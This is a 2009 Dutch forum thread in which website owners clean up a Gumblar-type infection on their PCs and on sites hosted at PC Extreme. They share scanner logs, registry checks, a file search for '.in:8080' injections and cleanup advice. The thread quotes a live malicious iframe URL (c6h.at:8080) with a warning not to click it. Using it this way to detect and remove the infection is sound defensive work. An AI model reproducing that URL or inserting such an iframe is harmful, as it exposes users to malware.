Dan komt het erop neer dat je je Register even door moet spitten (ja erg tijdrovend). En dat is per virus weer verschillend. Principe is wel vaak hetzelfde, ergens in een register staat een verwijzing naar een bestand om het virus weer terug te kopieren als het verwijderd is. Tevens komt de registersleutel ook weer terug in de HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run of HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce of HKEY_LOCAL_MACHINE\SOFTWARE\Windows\CurrentVersion\Explorer terecht.
Ik weet het niet precies, heb het virus zelf niet. Maar wel een soortgelijk ander virus ooit op m'n Windows machine gehad, die toevallig z'n verborgen bestand ergens in de prullenbak verborgen gehad en dat was erg naar te verwijderen omdat je em gewoon niet kan zien door op het prullenbakje te klikken enkel door een speciaal commando via de dos-prompt te gebruiken, waardoor die ineens wel te zien was. Hij was niet handmatig te verwijderen (vanwege systeemrestricties oid) enkel Malwarebytes kon em wel weg krijgen..
Ik ga eens even in het register loeren
(En natuurlijk zegt pc extreme dat ze het niet snappen, zou ik ook zeggen
Verder hier nog een handige link voor mensen die willen controleren of hun website geïnfecteerd is door dat Gumblar. http://unmaskparasites.com/
quote:Ik begin ook te denken dat het virus niet (meer) op deze pc staat.Op dinsdag 11 augustus 2009 @ 17:01 schreef An24 het volgende:
Hier dus ook zelfde probleem. Zit ook bij pc extreme. Ik had ook een trojan op mijn pc zitten, maar nu is pc helemaal schoon. Het virus staat dan ook niet lokaal, maar komt alleen van de server vandaan> Dizer helpt ook mij door het probleem heen.
(En natuurlijk zegt pc extreme dat ze het niet snappen, zou ik ook zeggen
quote:How to remove the infection from a website
If you manage websites using an FTP program, there is a chance that your sites have become infected. The first thing you must do is change the ftp passwords after your machine has been cleaned.
As yet, I am unaware of any automated script which removes the infection from a website, so I wrote my own and applied it to 5 of the websites that I manage that were infected.
I started off using the script by rad-one at http://blog.unmaskparasit(...)page-1/#comment-896.
I modified it heavily to use PHP regular expressions, to remove the gumblar modifications in html, php, and js files (it scans files with all extensions except .bak). Unlike rad-one’s detection script, this one yielded zero false positives for me, and eradicated the infection completely, as far as I can tell.
Here is what my script does:
1. Recurses through the whole website, excluding files and/or directories of your choosing.
2. Applies regular expressions to remove the infection from all the files (except those with the .bak extension) in each directory.
3. All modified files are backed up using the .bak extension.
4. Removes all files with paths ending in /images/image.php or /images/gifimg.php.
5. Runs in report mode by default, so you can see which files would be modified.
6. Has a “verbose” option, so you can see how each file will be modified.
It does not change directory permissions. I haven’t got around to investigating that area yet.
You may download it here. (Use at your own risk.)
Instructions for use
1. Place the file scan_files.php at your web document root.
2. Invoke it with no parameters to run it in report mode, where no modifications will be made.
3. Use scan_files.php?v=1 to run it in verbose mode.
4. Use scan_files.php?u=1 to run it in update mode, where the modifications will actually be made.
5. Use scan_files.php?u=1&v=1 to run it in both update and verbose modes.
Bron
[ Bericht 0% gewijzigd door Mr.Noodle op 11-08-2009 17:22:12 ]
quote:ik draai geen ftp prog hierOp dinsdag 11 augustus 2009 17:16 schreef Mr.Noodle het volgende:
Nou goed eerste stap is gezet, als het virus niet meer op de pc's staat moet het alleen nog van alle websites gehaald worden.
[..]
dus mijn computer kan niks hebben besmet.Vraag me alleen af of hij ECHT weg is
quote:Check nog even voor referenties naar Gumblar, zou even goed ook nog op andere locaties in het register kunnen staan.Op dinsdag 11 augustus 2009 17:08 schreef Qwea het volgende:
hij lijkt niet in mn register voor te komen, ook ;
[ afbeelding ]
[ afbeelding ]
Verder nog even MSConfig starten, kijken naar wat er bij "opstarten" en "services" en de opstart referenties daarin..
quote:Nou nee niet echt, het blijft vaak abracadabra.. MalwareBytes bij jou ook niks gevonden?Op dinsdag 11 augustus 2009 17:22 schreef MissBliss het volgende:
Is er een makkelijke manier om in dat register te kijken dan?
quote:voor die referenties.. moet ik dan alles handmatig nalopen?Op dinsdag 11 augustus 2009 17:21 schreef Mr.Noodle het volgende:
[..]
Check nog even voor referenties naar Gumblar, zou even goed ook nog op andere locaties in het register kunnen staan.
Verder nog even MSConfig starten, kijken naar wat er bij "opstarten" en "services" en de opstart referenties daarin..
ik kan in services geen gumblar vinden
quote:Die is nog bezig
[..]
Nou nee niet echt, het blijft vaak abracadabra.. MalwareBytes bij jou ook niks gevonden?
Maar hoe weet ik nou ooit of het echt weg is?
quote:Gewoon zoeken aanklikken.. CTRL-F en daar gumblar intypen. In Services staat het vaak niet onder eigen naam, maar vaak een verwijzing naar een vaag bestand zoals bijvoorbeeld: "C:\WINDOWS\ukvvq.qnx", dat zou bij jezelf ook een belletje dan moeten rinkelen. Overigens is het backup bestand vaak random een naam gegeven, wat het nog moeilijker maakt om het te detecteren..Op dinsdag 11 augustus 2009 17:25 schreef Qwea het volgende:
[..]
voor die referenties.. moet ik dan alles handmatig nalopen?
[ afbeelding ]
ik kan in services geen gumblar vinden
Overigens als je IE zoekpad ook aangepast is, moet je in het register bij de Internet Explorer, Search items kijken. Wellicht dat daar nog een gewijzigd pad staat..
quote:Bij een format, weet je zeker dat het echt weg is..Op dinsdag 11 augustus 2009 17:27 schreef MissBliss het volgende:
[..]
Maar hoe weet ik nou ooit of het echt weg is?
quote:Stomme vraag, maar waar vind ik die? Bij current user en dan software oid?Op dinsdag 11 augustus 2009 17:28 schreef Mr.Noodle het volgende:
[..]
Gewoon zoeken aanklikken.. CTRL-F en daar gumblar intypen. In Services staat het vaak niet onder eigen naam, maar vaak een verwijzing naar een vaag bestand zoals bijvoorbeeld: "C:\WINDOWS\ukvvq.qnx", dat zou bij jezelf ook een belletje dan moeten rinkelen. Overigens is het backup bestand vaak random een naam gegeven, wat het nog moeilijker maakt om het te detecteren..
Overigens als je IE zoekpad ook aangepast is, moet je in het register bij de Internet Explorer, Search items kijken. Wellicht dat daar nog een gewijzigd pad staat..
quote:Current user en Local MachineOp dinsdag 11 augustus 2009 17:31 schreef Qwea het volgende:
[..]
Stomme vraag, maar waar vind ik die? Bij current user en dan software oid?
en check je hosts-file en je lmhosts.sam
[ Bericht 2% gewijzigd door Mr.Noodle op 11-08-2009 17:41:04 ]
quote:
[..]
Bij een format, weet je zeker dat het echt weg is..
quote:Sorry, maar dit is echt eerlijk geantwoord. Ik weet ook niet alles, virussen van tegenwoordig volgen geen vast patroon meer, als in niet altijd dezelfde bestandsnamen, andere verwijzingen, verschillende locaties en programma's die ze infecteren. Ligt maar net aan wat er allemaal op de PC aan software staat. Ik kan er niet op kijken..
Format is tenminste wel alles schoon...
quote:en die host files staan daar ook?Op dinsdag 11 augustus 2009 17:32 schreef Mr.Noodle het volgende:
[..]
Current user en Local Machine
en check je hosts-file en je hosts.sam
superantispyware vindt 4 cookies
quote:Nee, die staan in je Windows Map. Gewoon even zoeken in Windows aanklikken en zoeken op "hosts". Dat zijn als het goed is tekstbestandjes die gebruikt worden door je browsers om te linken naar bepaalde sites. Soms staan daar ook dingen in die niet helemaal te vertrouwen zijn, bijvoorbeeld een link naar een IP-adres van een website met dezelfde spyware/malware.
Dat zou dus betekenen dat google.com indirect weer naar die vage link leidt.
quote:Ja, oké. Je bent nu toch bezig. Maar kijk nu even hoeveel tijd, hoeveel beveiligingsprogramma's later en hoeveel andere personen je hebt moeten op trommelen om het probleem te verhelpen.. Eigenlijk is het toch gewoon te gek voor woorden?Op dinsdag 11 augustus 2009 17:38 schreef MissBliss het volgende:
Ja, ik snap het wel, maar formatteren is echt een laatste redmiddel hoor, imho. Ik ga eerst wel aan de slag met al die programma's enzo.
Wat is dit eigk?
quote:*gaat zoeken in C : windowsOp dinsdag 11 augustus 2009 17:44 schreef Mr.Noodle het volgende:
[..]
Nee, die staan in je Windows Map. Gewoon even zoeken in Windows aanklikken en zoeken op "hosts". Dat zijn als het goed is tekstbestandjes die gebruikt worden door je browsers om te linken naar bepaalde sites. Soms staan daar ook dingen in die niet helemaal te vertrouwen zijn, bijvoorbeeld een link naar een IP-adres van een website met dezelfde spyware/malware.
Dat zou dus betekenen dat google.com indirect weer naar die vage link leidt.
quote:Dat is je profiel van Firefox waar al je history, settings in wordt opgeslagen. Het kan geïnfecteerd zijn, maar vaak is het een standaardonderdeel van Firefox. Dat die map zo raar heet is niet erg in dit geval. Is bij mijn Windows machine ook.Op dinsdag 11 augustus 2009 17:48 schreef Qwea het volgende:
ik kan geen search files vinden van IE.
Wat is dit eigk?
[ afbeelding ]
"SearchUrl" is overigens wel handig om die nog even te controleren in het register, net een paar keys erboven. Daar staan volgens mij alle urls van je zoekmachine van je browser in.
quote:aahOp dinsdag 11 augustus 2009 17:52 schreef Mr.Noodle het volgende:
[..]
Dat is je profiel van Firefox waar al je history, settings in wordt opgeslagen. Het kan geïnfecteerd zijn, maar vaak is het een standaardonderdeel van Firefox. Dat die map zo raar heet is niet erg in dit geval. Is bij mijn Windows machine ook.
wel tof trouwens, je hulp
quote:Ja oke, maar een format C kost ook een berg tijd en moeite hoor! Eerst het backuppen en daarna weer alles terugzetten en programma's opnieuw installeren enzo.
[..]
Ja, oké. Je bent nu toch bezig. Maar kijk nu even hoeveel tijd, hoeveel beveiligingsprogramma's later en hoeveel andere personen je hebt moeten op trommelen om het probleem te verhelpen.. Eigenlijk is het toch gewoon te gek voor woorden?
Hier de log:
quote:Malwarebytes' Anti-Malware 1.40
Database versie: 2601
Windows 5.1.2600 Service Pack 3
11-8-2009 18:06:36
mbam-log-2009-08-11 (18-06-36).txt
Scan type: Volledige Scan (C:\|J:\|)
Objecten gescand: 261566
Verstreken tijd: 1 hour(s), 19 minute(s), 38 second(s)
Geheugenprocessen geïnfecteerd: 0
Geheugenmodulen geïnfecteerd: 0
Registersleutels geïnfecteerd: 4
Registerwaarden geïnfecteerd: 6
Registerdata bestanden geïnfecteerd: 0
Mappen geïnfecteerd: 1
Bestanden geïnfecteerd: 5
Geheugenprocessen geïnfecteerd:
(Geen kwaadaardige items gevonden)
Geheugenmodulen geïnfecteerd:
(Geen kwaadaardige items gevonden)
Registersleutels geïnfecteerd:
HKEY_CLASSES_ROOT\wvfsrqab.bbwl (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CLASSES_ROOT\wvfsrqab.toolbar.1 (Trojan.FakeAlert) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Bind (Malware.Trace) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VSPlugin (Trojan.FakeAlert) -> Quarantined and deleted successfully.
Registerwaarden geïnfecteerd:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Extensions\CmdMapping\{c5428486-50a0-4a02-9d20-520b59a9f9b2} (Adware.Shopping.Report) -> Quarantined and deleted successfully.
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Extensions\CmdMapping\{c5428486-50a0-4a02-9d20-520b59a9f9b3} (Adware.Shopping.Report) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Settings\bf (Trojan.Agent) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Settings\bk (Trojan.Agent) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Settings\iu (Trojan.Agent) -> Quarantined and deleted successfully.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Settings\mu (Trojan.Agent) -> Quarantined and deleted successfully.
Registerdata bestanden geïnfecteerd:
(Geen kwaadaardige items gevonden)
Mappen geïnfecteerd:
C:\WINDOWS1\system32\LocalService32 (Worm.Archive) -> Quarantined and deleted successfully.
Bestanden geïnfecteerd:
C:\Documents and Settings\user.USER-70FB3322FA\Local Settings\Temp\~TM69.tmp (Trojan.Agent) -> Quarantined and deleted successfully.
C:\Documents and Settings\user.USER-70FB3322FA\Menu Start\Programma's\Opstarten\ikowin32.exe (Trojan.Agent) -> Quarantined and deleted successfully.
C:\WINDOWS1\system32\LocalService32\29.tmp (Worm.Archive) -> Quarantined and deleted successfully.
C:\Documents and Settings\user.USER-70FB3322FA\Application Data\wiaserva.log (Malware.Trace) -> Quarantined and deleted successfully.
C:\WINDOWS1\Temp\wpv441249365049.exe (Trojan.Agent) -> Quarantined and deleted successfully.
IE doet overigens niks raars hier
Mijn windows is al 7 minuten bezig met aflsuiten
Ik ga het echt niet zelf oplossen he, ze geven nu gewoon toe dat ze wel degelijk het probleem vormen in ons geval, MB!
quote:Op dinsdag 11 augustus 2009 @ 18:47 schreef An24 het volgende:
PC extreme gebeld. Ze zijn dus al langer belend met het virus, maar komen er maar niet achter waar hij bij hun psies vandaan komt. De collega die dit behandeld belt mij morgenochtend om 9 uur terug
Ik ga het echt niet zelf oplossen he, ze geven nu gewoon toe dat ze wel degelijk het probleem vormen in ons geval, MB!
Nou, lekker dan
Ik ben benieuwd naar wat ie je morgen te zeggen heeft!
Je kan van ook redelijk snel zoeken op dit virus. In windows de drive selecteren met rechts waar je html/php bestanden staan. Kies dan 'search' (of zoeken). In het bovenste invoerveld voer je dan in *.php, *.htm* in, en in het veld eronder .in:8080. Dan op search/zoeken klikken, en je krijgt alle files te zien waar de iframe is ingevoegd.
Het weghalen van deze code moet je natuurlijk pas doen als de veroorzaker van je pc af is. Je kan dan met zoeken en vervangen dit weghalen. Ik heb zelf met Crimson Editor dit gedaan, omdat je dan in alle bestanden het in een keer kan doen (ok, in batches van 500 files tegelijk).
Maar goed, ik zou een goeie claim neerleggen bij PCExtreme...
Overschrijft station C: volledig met een backup image om de computer volledige in de eerdere toestand terug te brengen.
Dan is dat toch goed genoeg? Want 6aug was er niks aan de hand
Nog ff in safe mode alles draaien voor de zekerheid
quote:Ik heb ze gebeld, tegen mij zijn ze nog in de ontkenningsfase
Heb je de helpdesk a 45ct per minuut gebeld? Want nu wil ik ze ook bellen.
Ik moet iig mailen en ze gaan aan de slag ofzo.
quote:Oh, dat ga ik proberen!Op dinsdag 11 augustus 2009 @ 18:59 schreef freud het volgende:
Het is ook best triest van PCExtreme... Zocht even snel online, en er zijn veel mensen met klachten. Lokaal bij An24 geen virussen (gescand met meerdere scanners), en alleen de bestanden aan de kant van PCE zijn veranderd. Zeer slecht dat ze uberhaupt geinfecteerd zijn, en nog triester dat ze blijkbaar wintel servers hebben (en geen *UX).
Je kan van ook redelijk snel zoeken op dit virus. In windows de drive selecteren met rechts waar je html/php bestanden staan. Kies dan 'search' (of zoeken). In het bovenste invoerveld voer je dan in *.php, *.htm* in, en in het veld eronder .in:8080. Dan op search/zoeken klikken, en je krijgt alle files te zien waar de iframe is ingevoegd.
Het weghalen van deze code moet je natuurlijk pas doen als de veroorzaker van je pc af is. Je kan dan met zoeken en vervangen dit weghalen. Ik heb zelf met Crimson Editor dit gedaan, omdat je dan in alle bestanden het in een keer kan doen (ok, in batches van 500 files tegelijk).
Maar goed, ik zou een goeie claim neerleggen bij PCExtreme...
quote:Niks gevonden!Op dinsdag 11 augustus 2009 @ 18:59 schreef freud het volgende:
*verhaal*
Had een etentje.Maar @MissBliss, je hebt al gescant naar een reboot? Trojan.Agent heeft namelijk het patroon om ook na een reboot terug te komen.
quote:Wat vindt jij van die volledig herstel van mij?Op dinsdag 11 augustus 2009 19:27 schreef CantFazeMe het volgende:
Sorry dat ik zo snel weg was.
Maar @MissBliss, je hebt al gescant naar een reboot? Trojan.Agent heeft namelijk het patroon om ook na een reboot terug te komen.
quote:Same here, maar dan ook na een volledig herstelOp dinsdag 11 augustus 2009 19:32 schreef MissBliss het volgende:
Nu bezig met een scan na reboot.
quote:Ik vind het raar dat ie er opeens niet meer is.Op dinsdag 11 augustus 2009 19:33 schreef Qwea het volgende:
[..]
Wat vindt jij van die volledig herstel van mij?
Maar de worm infecteert dus zich via netwerken en malwarebytes gaf bij jouw 0 infecties aan. Dus ik ga ervan uit dat het goed is. Je kunt ook e.v. Combofix gebruiken maar die vind ik erg risicovol.Edit: ja, je heb in feite inderdaad een "image" van je computer terug gezet vóór de infectie. Dat is altijd ook goed mogelijk.
Zolang je maar controleert.quote:Nou, avast gaf aan dat er een virus was, zie screenshot. Maar toen ik scande met avast, adaware, hijackthis, superantivirus en malware bytes, was er niks te vinden. En ook in het register vond ik niks.Op dinsdag 11 augustus 2009 19:36 schreef CantFazeMe het volgende:
[..]
Ik vind het raar dat ie er opeens niet meer is.
Logje van nu ;
quote:Malwarebytes' Anti-Malware 1.40
Database versie: 2605
Windows 6.0.6001 Service Pack 1 (Safe Mode)
11-8-2009 19:35:50
mbam-log-2009-08-11 (19-35-50).txt
Scan type: Volledige Scan (C:\|D:\|F:\|)
Objecten gescand: 186398
Verstreken tijd: 24 minute(s), 54 second(s)
Geheugenprocessen geïnfecteerd: 0
Geheugenmodulen geïnfecteerd: 0
Registersleutels geïnfecteerd: 0
Registerwaarden geïnfecteerd: 0
Registerdata bestanden geïnfecteerd: 0
Mappen geïnfecteerd: 0
Bestanden geïnfecteerd: 0
Geheugenprocessen geïnfecteerd:
(Geen kwaadaardige items gevonden)
Geheugenmodulen geïnfecteerd:
(Geen kwaadaardige items gevonden)
Registersleutels geïnfecteerd:
(Geen kwaadaardige items gevonden)
Registerwaarden geïnfecteerd:
(Geen kwaadaardige items gevonden)
Registerdata bestanden geïnfecteerd:
(Geen kwaadaardige items gevonden)
Mappen geïnfecteerd:
(Geen kwaadaardige items gevonden)
Bestanden geïnfecteerd:
(Geen kwaadaardige items gevonden)
http://www.bleepingcomputer.com/combofix/how-to-use-combofix
Ooh en avast doet nu voordat windows opgestart is een scan
quote:Dat zit wel goed!Op dinsdag 11 augustus 2009 19:37 schreef Qwea het volgende:
[..]
Nou, avast gaf aan dat er een virus was, zie screenshot. Maar toen ik scande met avast, adaware, hijackthis, superantivirus en malware bytes, was er niks te vinden. En ook in het register vond ik niks.
Logje van nu ;
[..]
quote:Combofix is ook een soort Malwarebytes, maar het is alleen in een CMD bestand. Ik vind het risicovol, want hij wijzigt ook je systeem tijdelijk tijdens de scan. Na de scan als je hem verwijderd wordt alles wel normaal. (je moet zelf nog wel wat aanpassen maar goed.) Ik gebruik het alleen als een laatste redmiddel.Op dinsdag 11 augustus 2009 19:38 schreef Qwea het volgende:
wat is combofix trouwens?
Ooh en avast doet nu voordat windows opgestart is een scan
quote:*netjes afblijftOp dinsdag 11 augustus 2009 19:42 schreef CantFazeMe het volgende:
En ik raad je het niet aan om aan te beginnen als je er niks van af weet.
*wacht totdat avast eindelijk eens klaar is. Hij is pas op 1%
quote:Ik wilde online scannen van trend micro.. maar dat ding doet het hierzo nietOp dinsdag 11 augustus 2009 20:46 schreef freud het volgende:
Het is trouwens ook wel aan te bevelen om na het scannen met je eigen virusscanner, nog een andere te draaien. Symantec en mcafee bieden online scanners aan. Is wel aan te raden om die ook nog eroverheen te gooien, just in case.
hij laad niet echt door tot in het scan proces. Ik moet de voorwaarden accepten en dan blijft ie maar laden maar doettie weinigquote:Ja, klaar en niks gevondenOp dinsdag 11 augustus 2009 @ 20:51 schreef Qwea het volgende:
trouwens MB ; ding al klaar? nog wat gevonden?
Misschien zet ik zo avast nog maar een keer aan
quote:nice!Op dinsdag 11 augustus 2009 20:52 schreef MissBliss het volgende:
[..]
Ja, klaar en niks gevonden
Misschien zet ik zo avast nog maar een keer aan
Ze zijn in de SC ook allemaal aant scannen omdat ze op je site zijn geweest
quote:ik heb greys ook maar een PM gedaanOp dinsdag 11 augustus 2009 21:04 schreef MissBliss het volgende:
Ja, ik had zelfs gevraagd: goh, doet mijn site ook raar bij jullie?
quote:Hier wel lijkt het. Image van de dag dat ik de laptop kreeg (6 aug) terug gezet... en volgens de buurman en mistermaniac is dat voldoende omdat ook de reg sleutels worden overschreven.
Toen in safemode maleware bytes gedraait, niks gevonden. Toen voor het opstarten in windows avast laten runnen, niks gevonden.
Moet enkel nog de online scan van trend micro doen, maar dat doek morgen wel.
MissBliss zou in principe nu ook schadevrij moeten zijn als er niks meer is gevonden door Malwarebytes' na een reboot. Maar goed, de kans dat zij nog sporen heeft iets groter omdat ze het register en het bestandssysteem niet overschreven heeft.
Rest alleen nog de websites, zoals ik al eerder zij, http://unmaskparasites.com/ om je website te checken op malicious code, mocht dat zo zijn nog even de stappen volgen die ik een aantal pagina's geleden had gepost. Als het goed is kan een hostingprovider gewoon dat scriptje loslaten op al hun websites..
Net nog even gecheckt, de website van MissBliss is nog steeds "Suspicious"
Die hidden link "http://c6h.at:8080/ts/in.cgi?pepsi138" (overigens niet op klikken) is er nog steeds..
[ Bericht 0% gewijzigd door Mr.Noodle op 11-08-2009 23:54:36 ]
quote:Ik zal mijn website eens bekiekenOp dinsdag 11 augustus 2009 23:49 schreef Mr.Noodle het volgende:
Meestal is een image terugzetten al genoeg. Dat is zowat hetzelfde als een format, alles wordt overschreven. Dat zit verder goed.
MissBliss zou in principe nu ook schadevrij moeten zijn als er niks meer is gevonden door Malwarebytes' na een reboot. Maar goed, de kans dat zij nog sporen heeft iets groter omdat ze het register en het bestandssysteem niet overschreven heeft.
Rest alleen nog de websites, zoals ik al eerder zij, http://unmaskparasites.com/ om je website te checken op malicious code, mocht dat zo zijn nog even de stappen volgen die ik een aantal pagina's geleden had gepost. Als het goed is kan een hostingprovider gewoon dat scriptje loslaten op al hun websites..
No external references found.
quote:Dizer gaat mijn website opnieuw online zetten en mijn ww veranderen. Ik laat hem dit wel even lezen!Op dinsdag 11 augustus 2009 @ 23:49 schreef Mr.Noodle het volgende:
Meestal is een image terugzetten al genoeg. Dat is zowat hetzelfde als een format, alles wordt overschreven. Dat zit verder goed.
MissBliss zou in principe nu ook schadevrij moeten zijn als er niks meer is gevonden door Malwarebytes' na een reboot. Maar goed, de kans dat zij nog sporen heeft iets groter omdat ze het register en het bestandssysteem niet overschreven heeft.
Rest alleen nog de websites, zoals ik al eerder zij, http://unmaskparasites.com/ om je website te checken op malicious code, mocht dat zo zijn nog even de stappen volgen die ik een aantal pagina's geleden had gepost. Als het goed is kan een hostingprovider gewoon dat scriptje loslaten op al hun websites..
Je hebt ge-edit: nee klopt, mijn site heb ik niks meer aan gedaan sinds gisteren, dus het virus zit daar nog steeds in!
Dizer moet hem offline halen en opnieuw uploaden
* <IFrame> hidden link - http://c6h.at:8080/ts/in.cgi?pepsi138
Zoals ik eerder al vermelde, zorg eerst dat je eigen pc schoon is! Pleur je FTP programma er even af en draai verschillende virusprogramma's + spyware scanners.
Daarna laat je eerst (of doe je zelf) je wachtwoorden wijzigen.. Deze zijn namelijk nu bekend bij het desbetreffende virus.. In de tussentijd laat je iemand wiens PC wél clean is even het iframe verwijderen.
This should do...
quote:Ja, this should do, vergeet je niet dat dat ding (ik las ergens op google al 9x zoiets) zich soms terug zet na rebootOp woensdag 12 augustus 2009 23:15 schreef St4ck3r het volgende:
Ik heb nu zelf ongeveer 15 van dit soort klanten gehad (ISP)
Zoals ik eerder al vermelde, zorg eerst dat je eigen pc schoon is! Pleur je FTP programma er even af en draai verschillende virusprogramma's + spyware scanners.
Daarna laat je eerst (of doe je zelf) je wachtwoorden wijzigen.. Deze zijn namelijk nu bekend bij het desbetreffende virus.. In de tussentijd laat je iemand wiens PC wél clean is even het iframe verwijderen.
This should do...
quote:mijne is mooi schoon na een nieuwe image terugzettenOp woensdag 12 augustus 2009 23:29 schreef St4ck3r het volgende:
Tja, in theorie had ik me eigen pc al lang een herinstall gegeven... Maar heb zelf 14 hostingpakketten en daar heb ik nergens last van...
9 min, wast gebeurt
quote:Volgens is het altijd direct je index pagina. Zeker omdat je na de domeinnaam geen aparte bestandsnaam opgeeft.Op woensdag 12 augustus 2009 21:23 schreef freud het volgende:
Goeie site, je kan alleen niet zien in welke pagina de link zit
Houdt dus in je standaard index.php, htm, html, asp, nogwattes meuk..
quote:Zeker weten kan ik het niet zonder format las ik in dit topic
Ik merk het vanzelf wel als ik iets update op de site
quote:nee combi van avast virusscan/malwarebytes/avast virusscan/cccleaner/malwarebytes/superspyware/geusens regcleaner/avast virusscanOp donderdag 13 augustus 2009 08:41 schreef Swetsenegger het volgende:
Dus... de oplossing was voor de meeste een complete reinstall van hun PC?
(clean install zou wellicht sneller gaan)quote:Christ...
[..]
nee combi van avast virusscan/malwarebytes/avast virusscan/cccleaner/malwarebytes/superspyware/geusens regcleaner/avast virusscan
quote:Re... koop een Apple. Je speelt nooit spellen, en het enige wat je doet is FOTOGRAFIE!!!!!
[..]
nee combi van avast virusscan/malwarebytes/avast virusscan/cccleaner/malwarebytes/superspyware/geusens regcleaner/avast virusscan
Weg met al het gezeur wat je altijd hebt op de computer. Weg met alle virussen die je telkens hebt....
Weg met al je HD gezeur dat elke keer niet werkt, zet er 2 TB externe HD's naast..
Weg met moederbord dat ontploft...
24" LED Scherm
2.66 GHZ dual core
4 GB geheugen
640 GB HD
1399 incl BTW
En voor 1699 incl BTW heb je een nog snellere!
quote:nou, dat was hier wel de snelste manier jaOp donderdag 13 augustus 2009 08:41 schreef Swetsenegger het volgende:
Dus... de oplossing was voor de meeste een complete reinstall van hun PC?
Die malware bytes loopt per x 1u. Die antispywaredinges ook 1u, en die avast 45 min. En die moet je dan ook nog her runnen bij het booten, image terug zetten duurde 9 min quote:Op donderdag 13 augustus 2009 10:37 schreef Dizer het volgende:
[..]
Re... koop een Apple. Je speelt nooit spellen, en het enige wat je doet is FOTOGRAFIE!!!!!
Weg met al het gezeur wat je altijd hebt op de computer. Weg met alle virussen die je telkens hebt....
Weg met al je HD gezeur dat elke keer niet werkt, zet er 2 TB externe HD's naast..
Weg met moederbord dat ontploft...
[ afbeelding ]
24" LED Scherm
2.66 GHZ dual core
4 GB geheugen
640 GB HD
1399 incl BTW
En voor 1699 incl BTW heb je een nog snellere!
heb je weer zo'n apple ophemeler. Ik heb nooit een hdd gehad die niet werkte... ook is mn mobo niet ontploft. En zodra mac os X en linux meer in opmars komen net zoals de gewone pc/windows.... dan krijg je ook virussen. 
quote:Ja maar je kent Re niet en zijn computers. Nachtenlang heb ik er aan moeten werken elke keer
[..]
quote:Als je écht voor een mac gaat, neem dan die van 1699Op donderdag 13 augustus 2009 11:07 schreef Re het volgende:
ja ja, kan hem natuurlijk wel weer van de belastingen aftrekken
quote:Snap je waarom mensen nu over gaan op Mac..Op donderdag 13 augustus 2009 09:38 schreef Re het volgende:
[..]
nee combi van avast virusscan/malwarebytes/avast virusscan/cccleaner/malwarebytes/superspyware/geusens regcleaner/avast virusscan
NoFiquote:Dat laatste is onzin.. Het marktaandeel EN het feit dat praktisch geen enkele mac gebruiker een virusscanner heeft draaien is de natte droom van iedere virusschrijver. Het is blijkbaar verrekte moeilijk.
[..]
Want als de wet van de grote aantallen gaan gelden is het een raadsel waarom voorheen Appache op iets van 94% van de webservers geinstalleerd was toch minder last had van hackpogingen dan het veel minder gebruikte IIS van microsoft.
Waarmee ik niet wil zeggen dat er nooit een virus voor een Mac ZAL komen, maar het is in ieder geval niet zo vanzelfsprekend als gedacht wordt.
Anyway, in dit geval lag het probleem meer bij adobe dan windows natuurlijk. Nijdig virusje....
quote:dat kan ongetwijfelt een reden zijn ja... aanschaffen weer nieuwe software is een tweedeOp donderdag 13 augustus 2009 13:16 schreef Mr.Noodle het volgende:
[..]
Snap je waarom mensen nu over gaan op Mac..
quote:Wehehehe.... nieuwe software... wheheheheheheeh
[..]
dat kan ongetwijfelt een reden zijn ja... aanschaffen weer nieuwe software is een tweede
.Je kent mij toch? En de rest is GRATIS want veel open source dingen
.Doe dat maar ergens anders
Virus is weg en zóveel moeite heeft het nou ook weer niet gekost hoor. Ik heb dinsdag een stuk of 5 virusscans gedraaid, maar dat is natuurlijk alleen een kwestie van op een knopje klikken en de rest gaat vanzelf. Een clean instal kost meer moeite
Nee kost weinig moeite, een dag productie kwijt.
quote:Dat bedenk ik me dus ook (nog steeds ftp niet aangeraakt, macje komt maandagOp donderdag 13 augustus 2009 16:26 schreef Swetsenegger het volgende:
Je bent een hele dag bezig geweest
Nee kost weinig moeite, een dag productie kwijt.
)